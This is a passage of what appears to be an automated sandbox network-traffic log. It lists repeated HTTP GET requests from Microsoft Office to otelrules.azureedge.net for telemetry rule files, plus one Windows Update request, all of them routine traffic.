Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
